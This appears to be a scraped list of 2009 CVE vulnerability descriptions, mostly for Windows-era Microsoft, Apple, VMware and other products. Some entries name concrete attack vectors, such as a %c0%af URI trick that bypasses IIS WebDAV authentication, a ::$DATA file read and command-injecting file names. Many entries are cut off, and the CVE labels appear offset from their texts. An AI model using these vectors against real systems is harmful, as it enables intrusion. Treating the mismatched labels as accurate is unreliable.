Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 does not properly process the headers of WSD messages, which allows remote attackers to execute arbitrary code via a crafted (1) message or (2) response, aka "Web Services on Devices API Memory Corruption Vulnerability." [CVE-2009-2506] Integer overflow in the text converters in Microsoft Office Word 2002 SP3 and 2003 SP3 [CVE-2009-2497] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0, 2.0 SP1, 2.0 SP2, 3.5, and 3.5 SP1, and Silverlight 2, does not properly handle interfaces, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted Silverlight application, (3) a crafted ASP.NET application, or (4) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Vulnerability." [CVE-2009-2496] Heap-based buffer overflow in the Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 SP1, and Office Small Business Accounting 2006 allows remote attackers to execute arbitrary code via unspecified parameters to unknown methods, aka "Office Web Components Heap Corruption Vulnerability." [CVE-2009-2495] The Active Template Library (ATL) in Microsoft Visual Studio .NET 2003 SP1, Visual Studio 2005 SP1 and 2008 Gold and SP1, and Visual C++ 2005 SP1 and 2008 Gold and SP1 does not properly enforce string termination, which allows remote attackers to obtain sensitive information via a crafted HTML document with an ATL (1) component or (2) control that triggers a buffer over-read, related to ATL headers and buffer allocation, aka "ATL Null String Vulnerability." [CVE-2009-2493] The Active Template Library (ATL) in Microsoft Visual Studio .NET 2003 SP1, Visual Studio 2005 SP1 and 2008 Gold and SP1, and Visual C++ 2005 SP1 and 2008 Gold and SP1 [CVE-2009-2479] Mozilla Firefox 3.0.x, 3.5, and 3.5.1 on Windows allows remote attackers to cause a denial of service (uncaught exception and application crash) via a long Unicode string argument to the write method. NOTE: this was originally reported as a stack-based buffer overflow. NOTE: on Linux and Mac OS X, a crash resulting from this long string reportedly occurs in an operating-system library, not in Firefox. [CVE-2009-2445] Oracle iPlanet Web Server (formerly Sun Java System Web Server or Sun ONE Web Server) 6.1 before SP12, and 7.0 through Update 6, when running on Windows, allows remote attackers to read arbitrary JSP files via an alternate data stream syntax, as demonstrated by a .jsp::$DATA URI. [CVE-2009-2433] Stack-based buffer overflow in the AddFavorite method in Microsoft Internet Explorer allows remote attackers to cause a denial of service (application crash) and possibly have unspecified other impact via a long URL in the first argument. [CVE-2009-2420] Apple Safari 3.2.3 does not properly implement the file: protocol handler, which allows remote attackers to read arbitrary files or cause a denial of service (launch of multiple Windows Explorer instances) via vectors involving an unspecified HTML tag, possibly a related issue to CVE-2009-1703. [CVE-2009-2411] Multiple integer overflows in the libsvn_delta library in Subversion before 1.5.7, and 1.6.x before 1.6.4, allow remote authenticated users and remote Subversion servers to execute arbitrary code via an svndiff stream with large windows that trigger a heap-based buffer overflow, a related issue to CVE-2009-2412. [CVE-2009-2350] Microsoft Internet Explorer 6.0.2900.2180 and earlier does not block javascript: URIs in Refresh headers in HTTP responses, which allows remote attackers to conduct cross-site scripting (XSS) attacks via vectors related to (1) injecting a Refresh header or (2) specifying the content of a Refresh header, a related issue to CVE-2009-1312. [CVE-2009-2261] PeaZIP 2.6.1, 2.5.1, and earlier on Windows allows user-assisted remote attackers to execute arbitrary commands via a .zip archive with a .txt file whose name contains \| (pipe) characters and a command. [CVE-2009-2069] Microsoft Internet Explorer before 8 displays a cached certificate for a (1) 4xx or (2) 5xx CONNECT response page returned by a proxy server, which allows man-in-the-middle attackers to spoof an arbitrary https site by letting a browser obtain a valid certificate from this site during one request, and then sending the browser a crafted 502 response page upon a subsequent request. [CVE-2009-2064] Microsoft Internet Explorer 8, and possibly other versions, detects http content in https web pages only when the top-level frame uses https, which allows man-in-the-middle attackers to execute arbitrary web script, in an https site's context, by modifying an http page to include an https iframe that references a script file on an http site, related to "HTTP-Intended-but-HTTPS-Loadable (HPIHSL) pages." [CVE-2009-2057] Microsoft Internet Explorer before 8 uses the HTTP Host header to determine the context of a document provided in a (1) 4xx or (2) 5xx CONNECT response from a proxy server, which allows man-in-the-middle attackers to execute arbitrary web script by modifying this CONNECT response, aka an "SSL tampering" attack. [CVE-2009-2027] The Installer in Apple Safari before 4.0 on Windows allows local users to gain privileges by checking a box that specifies an immediate launch of the application after installation, related to an unspecified compression method. [CVE-2009-1919] Microsoft Internet Explorer 5.01 SP4 and 6 SP1 [CVE-2009-1918] Microsoft Internet Explorer 5.01 SP4 and 6 SP1 [CVE-2009-1917] Microsoft Internet Explorer 6 SP1 [CVE-2009-1805] Unspecified vulnerability in the VMware Descheduled Time Accounting driver in VMware Workstation 6.5.1 and earlier, VMware Player 2.5.1 and earlier, VMware ACE 2.5.1 and earlier, VMware Server 1.x before 1.0.9 build 156507 and 2.x before 2.0.1 build 156745, VMware Fusion 2.x before 2.0.2 build 147997, VMware ESXi 3.5, and VMware ESX 3.0.2, 3.0.3, and 3.5, when the Descheduled Time Accounting Service is not running, allows guest OS users on Windows to cause a denial of service via unknown vectors. [CVE-2009-1783] Multiple FRISK Software F-Prot anti-virus products, including Antivirus for Exchange, Linux on IBM zSeries, Linux x86 File Servers, Linux x86 Mail Servers, Linux x86 Workstations, Solaris Mail Servers, Antivirus for Windows, and others, allow remote attackers to bypass malware detection via a crafted CAB archive. [CVE-2009-1782] Multiple F-Secure anti-virus products, including Anti-Virus for Microsoft Exchange 7.10 and earlier [CVE-2009-1761] The message engine in CA ARCserve Backup r12.0 and r12.0 SP1 for Windows allows remote attackers to cause a denial of service (crash) via (1) an invalid 0x13 message, which is not properly handled in the ASCORE module, or (2) a 0x3B message with invalid stub data that triggers an RPC marshalling error. [CVE-2009-1716] CFNetwork in Apple Safari before 4.0 on Windows does not properly protect the temporary files created for downloads, which allows local users to obtain sensitive information by reading these files. [CVE-2009-1707] Race condition in the Reset Safari implementation in Apple Safari before 4.0 on Windows might allow local users to read stored web-site passwords via unspecified vectors. [CVE-2009-1706] The Private Browsing feature in Apple Safari before 4.0 on Windows does not remove cookies from the alternate cookie store in unspecified circumstances upon (1) disabling of the feature or (2) exit of the application, which makes it easier for remote web servers to track users via a cookie. [CVE-2009-1705] CoreGraphics in Apple Safari before 4.0 on Windows does not properly use arithmetic during automatic hinting of TrueType fonts, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via crafted font data. [CVE-2009-1628] Stack-based buffer overflow in mnet.exe in Unisys Business Information Server (BIS) 10 and 10.1 on Windows allows remote attackers to execute arbitrary code via a crafted TCP packet. [CVE-2009-1565] vmnc.dll in the VMnc media codec in VMware Movie Decoder before 6.5.4 Build 246459 on Windows, and the movie decoder in VMware Workstation 6.5.x before 6.5.4 build 246459, VMware Player 2.5.x before 2.5.4 build 246459, and VMware Server 2.x on Windows, allows remote attackers to execute arbitrary code via an AVI file with crafted HexTile-encoded video chunks that trigger heap-based buffer overflows, related to "integer truncation errors." [CVE-2009-1564] Heap-based buffer overflow in vmnc.dll in the VMnc media codec in VMware Movie Decoder before 6.5.4 Build 246459 on Windows, and the movie decoder in VMware Workstation 6.5.x before 6.5.4 build 246459, VMware Player 2.5.x before 2.5.4 build 246459, and VMware Server 2.x on Windows, allows remote attackers to execute arbitrary code via an AVI file with crafted video chunks that use HexTile encoding. [CVE-2009-1547] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4, 6, 6 SP1, and 7 allows remote attackers to execute arbitrary code via a crafted data stream header that triggers memory corruption, aka "Data Stream Header Corruption Vulnerability." [CVE-2009-1542] The Virtual Machine Monitor (VMM) in Microsoft Virtual PC 2004 SP1, 2007, and 2007 SP1, and Microsoft Virtual Server 2005 R2 SP1, does not enforce CPU privilege-level requirements for all machine instructions, which allows guest OS users to execute arbitrary kernel-mode code and gain privileges within the guest OS via a crafted application, aka "Virtual PC and Virtual Server Privileged Instruction Decoding Vulnerability." [CVE-2009-1536] ASP.NET in Microsoft .NET Framework 2.0 SP1 and SP2 and 3.5 Gold and SP1, when ASP 2.0 is used in integrated mode on IIS 7.0, does not properly manage request scheduling, which allows remote attackers to cause a denial of service (daemon outage) via a series of crafted HTTP requests, aka "Remote Unauthenticated Denial of Service in ASP.NET Vulnerability." [CVE-2009-1535] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.1 and 6.0 allows remote attackers to bypass URI-based protection mechanisms, and list folders or read, create, or modify files, via a %c0%af (Unicode / character) at an arbitrary position in the URI, as demonstrated by inserting %c0%af into a "/protected/" initial pathname component to bypass the password protection on the protected\ folder, aka "IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1122. [CVE-2009-1534] Buffer overflow in the Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2000 Web Components SP3, Office XP Web Components SP3, BizTalk Server 2002, and Visual Studio .NET 2003 SP1 allows remote attackers to execute arbitrary code via crafted property values, aka "Office Web Components Buffer Overflow Vulnerability." [CVE-2009-1522] The IBM Tivoli Storage Manager (TSM) client 5.5.0.0 through 5.5.1.17 on AIX and Windows, when SSL is used, allows remote attackers to conduct unspecified man-in-the-middle attacks and read arbitrary files via unknown vectors. [CVE-2009-1491] McAfee GroupShield for Microsoft Exchange on Exchange Server 2000, and possibly other anti-virus or anti-spam products from McAfee or other vendors, does not scan X- headers for malicious content, which allows remote attackers to bypass virus detection via a crafted message, as demonstrated by a message with an X-Testing header and no message body. [CVE-2009-1473] The (1) Windows and (2) Java client programs for the ATEN KH1516i IP KVM switch with firmware 1.0.063 and the KN9116 IP KVM switch with firmware 1.1.104 do not properly use RSA cryptography for a symmetric session-key negotiation, which makes it easier for remote attackers to (a) decrypt network traffic, or (b) conduct man-in-the-middle attacks, by repeating unspecified "client-side calculations." [CVE-2009-1419] Unspecified vulnerability in HP Discovery & Dependency Mapping Inventory (DDMI) 2.0.0 through 2.52, 7.50, and 7.51 on Windows allows remote attackers to access DDMI agents via unknown vectors. [CVE-2009-1394] Stack-based buffer overflow in Motorola Timbuktu Pro 8.6.5 on Windows allows remote attackers to execute arbitrary code by sending a long malformed string over the PlughNTCommand named pipe. [CVE-2009-1348] The AV engine before DAT 5600 in McAfee VirusScan, Total Protection, Internet Security, SecurityShield for Microsoft ISA Server, Security for Microsoft Sharepoint, Security for Email Servers, Email Gateway, and Active Virus Defense allows remote attackers to bypass virus detection via (1) an invalid Headflags field in a malformed RAR archive, (2) an invalid Packsize field in a malformed RAR archive, or (3) an invalid Filelength field in a malformed ZIP archive. [CVE-2009-1276] XScreenSaver in Sun Solaris 10 and OpenSolaris before snv_109, and Solaris 8 and 9 with GNOME 2.0 or 2.0.2, allows physically proximate attackers to obtain sensitive information by reading popup windows, which are displayed even when the screen is locked, as demonstrated by Thunderbird new-mail notifications. [CVE-2009-1267] Unspecified vulnerability in the LDAP dissector in Wireshark 0.99.2 through 1.0.6, when running on Windows, allows remote attackers to cause a denial of service (crash) via unknown attack vectors. [CVE-2009-1233] Apple Safari 3.2.2 and 4 Beta on Windows allows remote attackers to cause a denial of service (application crash) via an XML document containing many nested A elements. [CVE-2009-1161] Directory traversal vulnerability in the TFTP service in Cisco CiscoWorks Common Services (CWCS) 3.0.x through 3.2.x on Windows, as used in Cisco Unified Service Monitor, Security Manager, TelePresence Readiness Assessment Manager, Unified Operations Manager, Unified Provisioning Manager, and other products, allows remote attackers to access arbitrary files via unspecified vectors. [CVE-2009-1140] Microsoft Internet Explorer 5.01 SP4 [CVE-2009-1137] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0223, CVE-2009-0226, and CVE-2009-0227. [CVE-2009-1136] The Microsoft Office Web Components Spreadsheet ActiveX control (aka OWC10 or OWC11), as distributed in Office XP SP3 and Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 Gold and SP1, and Office Small Business Accounting 2006, when used in Internet Explorer, allows remote attackers to execute arbitrary code via a crafted call to the msDataSourceObject method, as exploited in the wild in July and August 2009, aka "Office Web Components HTML Script Vulnerability." [CVE-2009-1135] Microsoft Internet Security and Acceleration (ISA) Server 2006 Gold and SP1, when Radius OTP is enabled, uses the HTTP-Basic authentication method, which allows remote attackers to gain the privileges of an arbitrary account, and access published web pages, via vectors involving attempted access to a network resource behind the ISA Server, aka "Radius OTP Bypass Vulnerability." [CVE-2009-1134] Excel in 2007 Microsoft Office System SP1 and SP2 [CVE-2009-1131] Multiple stack-based buffer overflows in Microsoft Office PowerPoint 2000 SP3 allow remote attackers to execute arbitrary code via a large amount of data associated with unspecified atoms in a PowerPoint file that triggers memory corruption, aka "Data Out of Bounds Vulnerability." [CVE-2009-1130] Heap-based buffer overflow in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3, and PowerPoint in Microsoft Office 2004 for Mac, allows remote attackers to execute arbitrary code via a crafted structure in a Notes container in a PowerPoint file that causes PowerPoint to read more data than was allocated when creating a C++ object, leading to an overwrite of a function pointer, aka "Heap Corruption Vulnerability." [CVE-2009-1129] Multiple stack-based buffer overflows in the PowerPoint 95 importer (PP7X32.DLL) in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allow remote attackers to execute arbitrary code via an inconsistent record length in sound data in a file that uses a PowerPoint 95 (PPT95) native file format, aka "PP7 Memory Corruption Vulnerability," a different vulnerability than CVE-2009-1128. [CVE-2009-1128] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 95 native file format, leading to memory corruption, aka "PP7 Memory Corruption Vulnerability," a different vulnerability than CVE-2009-1129. [CVE-2009-1044] Mozilla Firefox 3.0.7 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors related to the _moveToEdgeShift XUL tree method, which triggers garbage collection on objects that are still in use, as demonstrated by Nils during a PWN2OWN competition at CanSecWest 2009. [CVE-2009-1011] Unspecified vulnerability in the Outside In Technology component in Oracle Application Server 8.2.2 and 8.3.0 allows local users to affect confidentiality, integrity, and availability, related to HTML. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on reliable researcher claims that this issue is for multiple integer overflows in a function that parses an optional data stream within a Microsoft Office file, leading to a heap-based buffer overflow. [CVE-2009-0954] Heap-based buffer overflow in Apple QuickTime before 7.6.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a movie file containing crafted Clipping Region (CRGN) atom types. [CVE-2009-0944] The Microsoft Office Spotlight Importer in Spotlight in Apple Mac OS X 10.4.11 and 10.5 before 10.5.7 does not properly validate Microsoft Office files, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a file that triggers memory corruption. [CVE-2009-0901] The Active Template Library (ATL) in Microsoft Visual Studio .NET 2003 SP1, Visual Studio 2005 SP1 and 2008 Gold, and Visual C++ 2005 SP1 and 2008 Gold and SP1 [CVE-2009-0894] Heap-based buffer overflow in the decoder_create function in the initialization functionality in xvidcore/src/decoder.c in Xvid before 1.2.2, as used by Windows Media Player and other applications, allows remote attackers to execute arbitrary code via vectors involving the DirectShow (aka DShow) frontend and improper handling of the XVID_ERR_MEMORY return code during processing of a crafted movie file. NOTE: some of these details are obtained from third party information. [CVE-2009-0893] Multiple heap-based buffer overflows in xvidcore/src/decoder.c in the xvidcore library in Xvid before 1.2.2, as used by Windows Media Player and other applications, allow remote attackers to execute arbitrary code by providing a crafted macroblock (aka MBlock) number in a video stream in a crafted movie file that triggers heap memory corruption, related to a "missing resync marker range check" and the (1) decoder_iframe, (2) decoder_pframe, and (3) decoder_bframe functions. [CVE-2009-0880] Directory traversal vulnerability in the CIM server in IBM Director before 5.20.3 Service Update 2 on Windows allows remote attackers to load and execute arbitrary local DLL code via a .. (dot dot) in a /CIMListener/ URI in an M-POST request. [CVE-2009-0879] The CIM server in IBM Director before 5.20.3 Service Update 2 on Windows allows remote attackers to cause a denial of service (daemon crash) via a long consumer name, as demonstrated by an M-POST request to a long /CIMListener/ URI. [CVE-2009-0869] Buffer overflow in the client in IBM Tivoli Storage Manager (TSM) HSM 5.3.2.0 through 5.3.5.0, 5.4.0.0 through 5.4.2.5, and 5.5.0.0 through 5.5.1.4 on Windows allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors. [CVE-2009-0841] Directory traversal vulnerability in mapserv.c in mapserv in MapServer 4.x before 4.10.4 and 5.x before 5.2.2, when running on Windows with Cygwin, allows remote attackers to create arbitrary files via a .. (dot dot) in the id parameter. [CVE-2009-0671] REJECT Format string vulnerability in the University of Washington (UW) c-client library, as used by the UW IMAP toolkit imap-2007d and other applications, allows remote attackers to execute arbitrary code via format string specifiers in the initial request to the IMAP port (143/tcp). NOTE: Red Hat has disputed the vulnerability, stating "The Red Hat Security Response Team have been unable to confirm the existence of this format string vulnerability in the toolkit, and the sample published exploit is not complete or functional." CVE agrees that the exploit contains syntax errors and uses Unix-only include files while invoking Windows functions. [CVE-2009-0655] Lenovo Veriface III allows physically proximate attackers to login to a Windows account by presenting a "plain image" of the authorized user. [CVE-2009-0647] msnmsgr.exe in Windows Live Messenger (WLM) 2009 build 14.0.8064.206, and other 14.0.8064.x builds, allows remote attackers to cause a denial of service (application crash) via a modified header in a packet, as possibly demonstrated by a UTF-8.0 value of the charset field in the Content-Type header line. NOTE: this has been reported as a format string vulnerability by some sources, but the provenance of that information is unknown. [CVE-2009-0612] Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 3.x and InterScan Web Security Suite (IWSS) 3.x, when basic authorization is enabled on the standalone proxy, forwards the Proxy-Authorization header from Windows Media Player, which allows remote web servers to obtain credentials by offering a media stream and then capturing this header. [CVE-2009-0601] Format string vulnerability in Wireshark 0.99.8 through 1.0.5 on non-Windows platforms allows local users to cause a denial of service (application crash) via format string specifiers in the HOME environment variable. [CVE-2009-0566] Microsoft Office Publisher 2007 SP1 does not properly calculate object handler data for Publisher files, which allows remote attackers to execute arbitrary code via a crafted file in a legacy format that triggers memory corruption, aka "Pointer Dereference Vulnerability." [CVE-2009-0565] Buffer overflow in Microsoft Office Word 2000 SP3, 2002 SP3, and 2007 SP1 and SP2 [CVE-2009-0563] Stack-based buffer overflow in Microsoft Office Word 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-0562] The Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 SP1, and Office Small Business Accounting 2006 does not properly allocate memory, which allows remote attackers to execute arbitrary code via unspecified vectors that trigger "system state" corruption, aka "Office Web Components Memory Allocation Vulnerability." [CVE-2009-0561] Integer overflow in Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0560] Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0559] Stack-based buffer overflow in Excel in Microsoft Office 2000 SP3 and Office XP SP3 allows remote attackers to execute arbitrary code via a crafted Excel file with a malformed record object, aka "String Copy Stack-Based Overrun Vulnerability." [CVE-2009-0558] Array index error in Excel in Microsoft Office 2000 SP3 and Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac, allows remote attackers to execute arbitrary code via a crafted Excel file with a malformed record object, aka "Array Indexing Memory Corruption Vulnerability." [CVE-2009-0557] Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0556] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3, and PowerPoint in Microsoft Office 2004 for Mac, allows remote attackers to execute arbitrary code via a PowerPoint file with an OutlineTextRefAtom containing an an invalid index value that triggers memory corruption, as exploited in the wild in April 2009 by Exploit:Win32/Apptom.gen, aka "Memory Corruption Vulnerability." [CVE-2009-0549] Excel in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, and Office 2004 and 2008 for Mac [CVE-2009-0537] Integer overflow in the fts_build function in fts.c in libc in (1) OpenBSD 4.4 and earlier and (2) Microsoft Interix 6.0 build 10.0.6030.0 allows context-dependent attackers to cause a denial of service (application crash) via a deep directory tree, related to the fts_level structure member, as demonstrated by (a) du, (b) rm, (c) chmod, and (d) chgrp on OpenBSD [CVE-2009-0522] Adobe Flash Player 9.x before 9.0.159.0 and 10.x before 10.0.22.87 on Windows allows remote attackers to trick a user into visiting an arbitrary URL via an unspecified manipulation of the "mouse pointer display," related to a "Clickjacking attack." [CVE-2009-0438] IBM WebSphere Application Server (WAS) 7 before 7.0.0.1 on Windows allows remote attackers to bypass "Authorization checking" and obtain sensitive information from JSP pages via a crafted request. NOTE: this is probably a duplicate of CVE-2008-5412. [CVE-2009-0437] The Installation Factory installation process for IBM WebSphere Application Server (WAS) 6.0.2 on Windows, when WAS is registered as a Windows service, allows local users to obtain sensitive information by reading the logs/instconfigifwas6.log log file. [CVE-2009-0419] Microsoft XML Core Services, as used in Microsoft Expression Web, Office, Internet Explorer 6 and 7, and other products, does not properly restrict access from web pages to Set-Cookie2 HTTP response headers, which allows remote attackers to obtain sensitive information from cookies via XMLHttpRequest calls, related to the HTTPOnly protection mechanism. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2008-4033. [CVE-2009-0389] Multiple insecure method vulnerabilities in the Web On Windows (WOW) ActiveX control in WOW ActiveX 2 allow remote attackers to (1) create and overwrite arbitrary files via the WriteIniFileString method, (2) execute arbitrary programs via the ShellExecute method, (3) read from the registry via unspecified vectors, and (4) write to the registry via unspecified vectors. NOTE: vectors 1 and 2 can be used together to execute arbitrary code. [CVE-2009-0376] Heap-based buffer overflow in a DLL file in RealNetworks RealPlayer 10, RealPlayer 10.5 6.0.12.1040 through 6.0.12.1741, RealPlayer 11 11.0.0 through 11.0.4, RealPlayer Enterprise, Mac RealPlayer 10 and 10.1, Linux RealPlayer 10, and Helix Player 10.x allows remote attackers to execute arbitrary code via a crafted Internet Video Recording (IVR) file with a modified field that controls an unspecified structure length and triggers heap corruption, related to use of RealPlayer through a Windows Explorer plugin. [CVE-2009-0375] Buffer overflow in a DLL file in RealNetworks RealPlayer 10, RealPlayer 10.5 6.0.12.1040 through 6.0.12.1741, RealPlayer 11 11.0.0 through 11.0.4, RealPlayer Enterprise, Mac RealPlayer 10 and 10.1, Linux RealPlayer 10, and Helix Player 10.x allows remote attackers to execute arbitrary code via a crafted Internet Video Recording (IVR) file with a filename length field containing a large integer, which triggers overwrite of an arbitrary memory location with a 0x00 byte value, related to use of RealPlayer through a Windows Explorer plugin. [CVE-2009-0369] Microsoft Internet Explorer 7 allows remote attackers to trick a user into visiting an arbitrary URL via an onclick action that moves a crafted element to the current mouse position, related to a "Clickjacking" vulnerability. [CVE-2009-0321] Apple Safari 3.2.1 (aka AppVer 3.525.27.1) on Windows allows remote attackers to cause a denial of service (infinite loop or access violation) via a link to an http URI in which the authority (aka hostname) portion is either a (1) . (dot) or (2) .. (dot dot) sequence. [CVE-2009-0282] Integer overflow in Ralink Technology USB wireless adapter (RT73) 3.08 for Windows, and other wireless card drivers including rt2400, rt2500, rt2570, and rt61, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a Probe Request packet with a long SSID, possibly related to an integer signedness error. [CVE-2009-0238] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP3, and 2007 SP1 [CVE-2009-0237] Cross-site scripting (XSS) vulnerability in cookieauth.dll in the HTML forms authentication component in Microsoft Forefront Threat Management Gateway, Medium Business Edition (TMG MBE) [CVE-2009-0227] Stack-based buffer overflow in the PowerPoint 4.2 conversion filter (PP4X32.DLL) in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via a large number of structures in sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0223, CVE-2009-0226, and CVE-2009-1137. [CVE-2009-0226] Stack-based buffer overflow in the PowerPoint 4.2 conversion filter in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via a long string in sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0223, CVE-2009-0227, and CVE-2009-1137. [CVE-2009-0225] Microsoft Office PowerPoint 2002 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 95 native file format, leading to improper "array indexing" and memory corruption, aka "PP7 Memory Corruption Vulnerability." [CVE-2009-0224] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 [CVE-2009-0223] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 4.0 native file format, leading to memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0222, CVE-2009-0226, CVE-2009-0227, and CVE-2009-1137. [CVE-2009-0222] Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allows remote attackers to execute arbitrary code via crafted sound data in a file that uses a PowerPoint 4.0 native file format, leading to a "pointer overwrite" and memory corruption, aka "Legacy File Format Vulnerability," a different vulnerability than CVE-2009-0223, CVE-2009-0226, CVE-2009-0227, and CVE-2009-1137. [CVE-2009-0221] Integer overflow in Microsoft Office PowerPoint 2002 SP3 and 2003 SP3 allows remote attackers to execute arbitrary code via a PowerPoint file containing a crafted record type for "collaboration information for different slides" that contains a field that specifies a large number of records, which triggers an under-allocated buffer and a heap-based buffer overflow, aka "Integer Overflow Vulnerability." [CVE-2009-0220] Multiple stack-based buffer overflows in the PowerPoint 4.0 importer (PP4X32.DLL) in Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3 allow remote attackers to execute arbitrary code via crafted formatting data for paragraphs in a file that uses a PowerPoint 4.0 native file format, related to (1) an incorrect calculation from a record header, or (2) an interget that is used to specify the number of bytes to copy, aka "Legacy File Format Vulnerability." [CVE-2009-0208] Unspecified vulnerability in HP Virtual Rooms Client before 7.0.1, when running on Windows, allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2009-0199] Heap-based buffer overflow in the VMnc media codec in vmnc.dll in VMware Movie Decoder before 6.5.3 build 185404, VMware Workstation 6.5.x before 6.5.3 build 185404, VMware Player 2.5.x before 2.5.3 build 185404, and VMware ACE 2.5.x before 2.5.3 build 185404 on Windows might allow remote attackers to execute arbitrary code via a video file with crafted dimensions (aka framebuffer parameters). [CVE-2009-0162] Cross-site scripting (XSS) vulnerability in Safari before 3.2.3, and 4 Public Beta, on Apple Mac OS X 10.5 before 10.5.7 and Windows allows remote attackers to inject arbitrary web script or HTML via a crafted feed: URL. [CVE-2009-0137] Multiple unspecified vulnerabilities in Safari RSS in Apple Mac OS X 10.4.11 and 10.5.6, and Windows XP and Vista, allow remote attackers to execute arbitrary JavaScript in the local security zone via a crafted feed: URL, related to "input validation issues." [CVE-2009-0133] Buffer overflow in Microsoft HTML Help Workshop 4.74 and earlier allows context-dependent attackers to execute arbitrary code via a .hhp file with a long "Index file" field, possibly a related issue to CVE-2006-0564. [CVE-2009-0123] Unspecified vulnerability in Apple Safari on Mac OS X 10.5 and Windows allows remote attackers to read arbitrary files on a client machine via vectors related to the association of Safari with the (1) feed, (2) feeds, and (3) feedsearch URL types for RSS feeds. NOTE: as of 20090114, the only disclosure is a vague pre-advisory. However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes. [CVE-2009-0102] Microsoft Project 2000 SR1 and 2002 SP1, and Office Project 2003 SP3, does not properly handle memory allocation for Project files, which allows remote attackers to execute arbitrary code via a malformed file, aka "Project Memory Validation Vulnerability." [CVE-2009-0100] Microsoft Office Excel 2000 SP3, 2002 SP3, 2003 SP3, and 2007 SP1 [CVE-2009-0099] The Electronic Messaging System Microsoft Data Base (EMSMDB32) provider in Microsoft Exchange 2000 Server SP3 and Exchange Server 2003 SP2, as used in Exchange System Attendant, allows remote attackers to cause a denial of service (application outage) via a malformed MAPI command, aka "Literal Processing Vulnerability." [CVE-2009-0098] Microsoft Exchange 2000 Server SP3, Exchange Server 2003 SP2, and Exchange Server 2007 SP1 do not properly interpret Transport Neutral Encapsulation (TNEF) properties, which allows remote attackers to execute arbitrary code via a crafted TNEF message, aka "Memory Corruption Vulnerability." [CVE-2009-0097] Microsoft Office Visio 2002 SP2 and 2003 SP3 does not properly validate memory allocation for Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Memory Corruption Vulnerability." [CVE-2009-0096] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 does not properly perform memory copy operations for object data, which allows remote attackers to execute arbitrary code via a crafted Visio document, aka "Memory Corruption Vulnerability." [CVE-2009-0095] Microsoft Office Visio 2002 SP2, 2003 SP3, and 2007 SP1 does not properly validate object data in Visio files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Memory Validation Vulnerability." [CVE-2009-0091] Microsoft .NET Framework 2.0, 2.0 SP1, and 3.5 does not properly enforce a certain type-equality constraint in .NET verifiable code, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft .NET Framework Type Verification Vulnerability." [CVE-2009-0090] 